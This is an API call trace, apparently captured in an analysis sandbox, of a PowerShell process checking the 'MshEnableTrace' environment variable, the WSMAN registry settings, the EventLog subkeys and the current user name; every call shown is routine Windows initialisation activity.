	[0790.701] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.701] CoTaskMemFree (pv=0x41ef10) 
	[0790.703] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.703] CoTaskMemFree (pv=0x41ef10) 
	[0790.704] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.705] CoTaskMemFree (pv=0x41ef10) 
	[0790.717] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.717] CoTaskMemFree (pv=0x41ef10) 
	[0790.720] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.720] CoTaskMemFree (pv=0x41ef10) 
	[0790.720] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0790.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.720] CoTaskMemFree (pv=0x41ef10) 
	[0790.727] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfd8 | out: phkResult=0x1ecfd8*=0x314) returned 0x0
	[0790.731] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecedc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0790.731] CoTaskMemFree (pv=0x0) 
	[0790.732] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0790.732] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x403ff0, lpcchValueName=0x1ecf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ecf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.732] CoTaskMemFree (pv=0x403ff0) 
	[0790.732] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0790.732] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x403ff0, lpcchValueName=0x1ecf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ecf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.732] CoTaskMemFree (pv=0x403ff0) 
	[0790.732] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0790.732] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x403ff0, lpcchValueName=0x1ecf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ecf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.732] CoTaskMemFree (pv=0x403ff0) 
	[0790.733] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf6c, lpData=0x0, lpcbData=0x1ecf68*=0x0 | out: lpType=0x1ecf6c*=0x1, lpData=0x0, lpcbData=0x1ecf68*=0x8) returned 0x0
	[0790.733] CoTaskMemAlloc (cb=0xc) returned 0x470c40
	[0790.733] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf3c, lpData=0x470c40, lpcbData=0x1ecf38*=0x8 | out: lpType=0x1ecf3c*=0x1, lpData="2.0", lpcbData=0x1ecf38*=0x8) returned 0x0
	[0790.733] CoTaskMemFree (pv=0x470c40) 
	[0792.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf28 | out: phkResult=0x1ecf28*=0x1c0) returned 0x0
	[0792.898] RegQueryInfoKeyW (in: hKey=0x1c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece2c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece28*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.898] CoTaskMemFree (pv=0x0) 
	[0792.898] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0792.898] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x0, lpValueName=0x403ff0, lpcchValueName=0x1eced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1eced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0792.898] CoTaskMemFree (pv=0x403ff0) 
	[0792.898] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0792.898] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x1, lpValueName=0x403ff0, lpcchValueName=0x1eced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1eced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0792.898] CoTaskMemFree (pv=0x403ff0) 
	[0792.898] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0792.898] RegEnumValueW (in: hKey=0x1c0, dwIndex=0x2, lpValueName=0x403ff0, lpcchValueName=0x1eced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1eced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0792.898] CoTaskMemFree (pv=0x403ff0) 
	[0792.898] RegQueryValueExW (in: hKey=0x1c0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecebc, lpData=0x0, lpcbData=0x1eceb8*=0x0 | out: lpType=0x1ecebc*=0x1, lpData=0x0, lpcbData=0x1eceb8*=0x8) returned 0x0
	[0792.898] CoTaskMemAlloc (cb=0xc) returned 0x470e20
	[0792.898] RegQueryValueExW (in: hKey=0x1c0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ece8c, lpData=0x470e20, lpcbData=0x1ece88*=0x8 | out: lpType=0x1ece8c*=0x1, lpData="2.0", lpcbData=0x1ece88*=0x8) returned 0x0
	[0792.898] CoTaskMemFree (pv=0x470e20) 
	[0792.900] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0792.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.900] CoTaskMemFree (pv=0x41ef10) 
	[0793.951] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0793.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.952] CoTaskMemFree (pv=0x41ef10) 
	[0793.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf58 | out: phkResult=0x1ecf58*=0x318) returned 0x0
	[0793.962] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ececc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecec8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ececc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecec8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.962] CoTaskMemFree (pv=0x0) 
	[0793.963] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.963] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.963] CoTaskMemFree (pv=0x403ff0) 
	[0793.963] CoTaskMemFree (pv=0x0) 
	[0793.963] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.963] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.963] CoTaskMemFree (pv=0x403ff0) 
	[0793.963] CoTaskMemFree (pv=0x0) 
	[0793.963] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.963] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.963] CoTaskMemFree (pv=0x403ff0) 
	[0793.963] CoTaskMemFree (pv=0x0) 
	[0793.963] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.963] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.964] CoTaskMemFree (pv=0x403ff0) 
	[0793.964] CoTaskMemFree (pv=0x0) 
	[0793.964] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.964] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.964] CoTaskMemFree (pv=0x403ff0) 
	[0793.964] CoTaskMemFree (pv=0x0) 
	[0793.964] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.964] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.964] CoTaskMemFree (pv=0x403ff0) 
	[0793.964] CoTaskMemFree (pv=0x0) 
	[0793.964] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.964] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.964] CoTaskMemFree (pv=0x403ff0) 
	[0793.964] CoTaskMemFree (pv=0x0) 
	[0793.964] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.964] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.964] CoTaskMemFree (pv=0x403ff0) 
	[0793.964] CoTaskMemFree (pv=0x0) 
	[0793.964] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0793.964] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x403ff0, lpcchName=0x1ecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0793.965] CoTaskMemFree (pv=0x403ff0) 
	[0793.965] CoTaskMemFree (pv=0x0) 
	[0793.965] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x31c) returned 0x0
	[0793.965] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.965] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x320) returned 0x0
	[0793.965] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.965] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x324) returned 0x0
	[0793.966] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.966] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x328) returned 0x0
	[0793.966] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.966] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x32c) returned 0x0
	[0793.966] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.966] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x330) returned 0x0
	[0793.967] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.967] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x334) returned 0x0
	[0793.967] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.967] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x338) returned 0x0
	[0793.967] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x0) returned 0x2
	[0793.967] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x33c) returned 0x0
	[0793.967] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x340) returned 0x0
	[0793.967] RegCloseKey (hKey=0x340) returned 0x0
	[0793.968] RegCloseKey (hKey=0x318) returned 0x0
	[0793.969] RegCloseKey (hKey=0x33c) returned 0x0
	[0795.165] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0795.166] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0795.167] CoTaskMemFree (pv=0x1b8afae0) 
	[0795.168] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0795.168] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0795.168] CoTaskMemFree (pv=0x403ff0) 
	[0796.249] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf08 | out: phkResult=0x1ecf08*=0x344) returned 0x0
	[0796.249] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece78, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece7c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece78*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.249] CoTaskMemFree (pv=0x0) 
	[0796.249] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.249] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.250] CoTaskMemFree (pv=0x403ff0) 
	[0796.250] CoTaskMemFree (pv=0x0) 
	[0796.250] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.250] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.250] CoTaskMemFree (pv=0x403ff0) 
	[0796.250] CoTaskMemFree (pv=0x0) 
	[0796.250] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.250] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.250] CoTaskMemFree (pv=0x403ff0) 
	[0796.250] CoTaskMemFree (pv=0x0) 
	[0796.250] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.250] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.250] CoTaskMemFree (pv=0x403ff0) 
	[0796.250] CoTaskMemFree (pv=0x0) 
	[0796.250] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.250] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.250] CoTaskMemFree (pv=0x403ff0) 
	[0796.250] CoTaskMemFree (pv=0x0) 
	[0796.251] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.251] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.251] CoTaskMemFree (pv=0x403ff0) 
	[0796.251] CoTaskMemFree (pv=0x0) 
	[0796.251] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.251] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.251] CoTaskMemFree (pv=0x403ff0) 
	[0796.251] CoTaskMemFree (pv=0x0) 
	[0796.251] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.251] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.251] CoTaskMemFree (pv=0x403ff0) 
	[0796.251] CoTaskMemFree (pv=0x0) 
	[0796.251] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0796.251] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x403ff0, lpcchName=0x1ecf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.251] CoTaskMemFree (pv=0x403ff0) 
	[0796.251] CoTaskMemFree (pv=0x0) 
	[0796.251] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x348) returned 0x0
	[0796.252] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.252] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x34c) returned 0x0
	[0796.252] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.252] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x350) returned 0x0
	[0796.252] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.252] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x354) returned 0x0
	[0796.252] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.252] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x358) returned 0x0
	[0796.253] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.253] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x35c) returned 0x0
	[0796.253] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.253] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x360) returned 0x0
	[0796.253] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.253] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x364) returned 0x0
	[0796.253] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x0) returned 0x2
	[0796.253] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x368) returned 0x0
	[0796.253] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x36c) returned 0x0
	[0796.254] RegCloseKey (hKey=0x36c) returned 0x0
	[0796.254] RegCloseKey (hKey=0x344) returned 0x0
	[0796.254] RegCloseKey (hKey=0x368) returned 0x0
	[0796.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf08 | out: phkResult=0x1ecf08*=0x368) returned 0x0
	[0796.258] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece78, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece7c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece78*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0796.258] CoTaskMemFree (pv=0x0) 
	[0796.258] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
